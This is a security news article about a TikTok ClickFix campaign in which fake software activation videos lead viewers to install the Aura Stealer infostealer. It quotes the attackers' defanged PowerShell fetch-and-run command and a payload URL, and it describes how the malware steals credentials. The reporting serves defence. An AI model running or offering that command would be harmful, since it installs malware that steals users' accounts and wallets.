Cybercriminals are distributing information-stealing malware on TikTok using videos disguised as free software activation guides. According to BleepingComputer, ISC Handler Xavier Mertens identified the ongoing campaign, which employs a social engineering method known as a ClickFix attack to infect computer systems.
The videos, observed by BleepingComputer, claim to provide instructions for activating legitimate software such as Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro. The campaign also promotes fictitious services, including “Netflix Premium” and “Spotify Premium.” Mertens noted this activity is largely the same as a campaign previously observed by the security firm Trend Micro in May. The videos use a social engineering technique that presents a seemingly valid fix or set of instructions to deceive users into compromising their own machines.
This ClickFix attack tricks users into executing malicious PowerShell commands. Each video displays a one-line command, such as `iex (irm slmgr[.]win/photoshop)`, and instructs viewers to run it with administrator privileges. The program name in the URL is modified to match the software being impersonated; a fake Windows guide would use a URL containing “windows” instead of “photoshop.”
When the command is executed, PowerShell connects to the remote site `slmgr[.]win` to retrieve and run another PowerShell script. This script downloads two executables from Cloudflare pages. The first, from `https://file-epq[.]pages[.]dev/updater.exe`, is a variant of Aura Stealer malware. This infostealer is designed to harvest saved browser credentials, authentication cookies, cryptocurrency wallet data, and other application credentials. The stolen data is then uploaded to the attackers, granting them access to the victim’s accounts.
A second payload, `source.exe`, is also downloaded as part of the attack. According to Mertens, this executable self-compiles code using .NET’s built-in Visual C# Compiler (`csc.exe`). The resulting code is subsequently injected and launched directly in memory. The specific purpose of this additional payload remains unclear.
Users who have performed these steps should consider all of their credentials compromised. The recommended course of action is to immediately reset passwords on all sites and services they use to prevent unauthorized account access and further data theft.
ClickFix attacks have become popular over the past year and are used to distribute various malware strains in ransomware and cryptocurrency theft campaigns. As a general rule, users should never copy text from a website and run it in an operating system dialog box. This advisory includes the File Explorer address bar, command prompt, PowerShell prompts, the macOS terminal, and Linux shells.
